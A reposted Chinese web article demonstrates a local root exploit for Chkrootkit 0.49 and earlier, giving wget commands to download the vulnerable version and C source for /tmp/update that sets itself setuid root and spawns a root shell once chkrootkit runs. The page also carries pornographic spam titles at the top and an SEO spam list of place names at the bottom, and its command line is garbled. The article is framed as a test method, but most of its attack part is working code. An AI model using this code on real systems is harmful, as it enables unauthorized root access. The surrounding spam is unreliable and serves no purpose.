国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 網管 > 互助交流 > 正文

安全漏洞:Chkrootkit 0.49 本地提權漏洞的測試方法

2020-10-21 19:24:50
字體:
來源:轉載
供稿:網友

  Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提權漏洞。先來演示下吧:

  可以查看自己安裝的是不是升到最新版了,或者下載有漏洞的版本進行實驗:

  wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/

  ./chkrootkit -V

  普通用戶在 /tmp 目錄下新建 update.c(代碼實示例如下):

  #include <unistd.h>

  void main(void)

  {

  system("chown root:root /tmp/update");

  system("chmod 4755 /tmp/update");

  setuid(0);

  setgid(0);

  execl("/bin/sh","sh",NULL);

  }

  然后編譯好 update ,看下update的文件詳情:

  

  執行有漏洞的 chkrootkit :

  

  再來看下 update 已經成功屬于 root 組了!

  

  以上就是查看自己 Ckrootkit 0.49 是不是安裝的是不是升到最新版了,或者下載有漏洞的版本進行實驗的步驟,謝謝閱讀,希望能幫到大家,請繼續關注武林網,我們會努力分享更多優秀的文章。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 福州市| 济南市| 无为县| 大兴区| 桂阳县| 扎鲁特旗| 库伦旗| 江阴市| 娄底市| 迁安市| 安福县| 云阳县| 家居| 红原县| 岑巩县| 堆龙德庆县| 于田县| 西青区| 瑞丽市| 湖南省| 丰县| 阳西县| 探索| 兴化市| 湄潭县| 海淀区| 福建省| 敦化市| 开江县| 花莲县| 南陵县| 松阳县| 新昌县| 鹤壁市| 商洛市| 横峰县| 城市| 西城区| 米林县| 普宁市| 阜新市|